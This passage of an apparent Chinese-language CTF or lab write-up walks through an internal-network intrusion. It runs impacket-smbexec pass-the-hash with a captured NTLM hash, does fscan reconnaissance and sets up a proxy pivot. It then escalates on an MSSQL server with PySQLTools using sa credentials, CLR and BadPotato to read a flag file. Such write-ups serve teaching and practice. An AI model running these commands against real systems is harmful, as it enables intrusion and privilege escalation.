-rw-rw-rw-    3299328  Sat May 24 17:37:58 2025 agent.exe
-rw-rw-rw-    6427136  Sat May 24 17:36:03 2025 fscan.exe

然后用之前拿的哈希PTH上去执行命令

1	proxychains -q impacket-smbexec -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1 pentest.me/administrator@172.24.7.43 -codec gbk

扫描得到

(icmp) Target 172.26.8.12     is alive
(icmp) Target 172.26.8.16     is alive
[*] Icmp alive hosts len is: 2
172.26.8.16:445 open
172.26.8.12:445 open
172.26.8.16:139 open
172.26.8.16:135 open
172.26.8.16:1433 open
172.26.8.12:139 open
172.26.8.12:135 open
[*] alive ports len is: 7
start vulscan
[*] NetInfo 
[*]172.26.8.12
   [->]IZMN9U6ZO3VTRPZ
   [->]172.24.7.43
   [->]172.26.8.12
[*] NetInfo 
[*]172.26.8.16
   [->]iZq7i1huitnk6hZ
   [->]172.26.8.16
[*] NetBios 172.26.8.16     WORKGROUP\iZq7i1huitnk6hZ           Windows Server 2016 Datacenter 14393

目标是172.26.8.16，并且开了1433端口。

搭一下代理，最后的代理状态如下：

listen 9999
agent -rhost 172.24.7.16 -rport 9999

用Ridter/PySQLTools: Mssql利用工具一把梭提权拿下了。

1	proxychains -q python PySQLTools.py sa:'sqlserver_2022'@172.26.8.16 -debug

1 2	enable_ole enable_clr

1 2	install_clr clr_badpotato whoami

1	clr_badpotato type C:\Users\Administrator\Desktop\flag.txt

flag{clr?no_flag}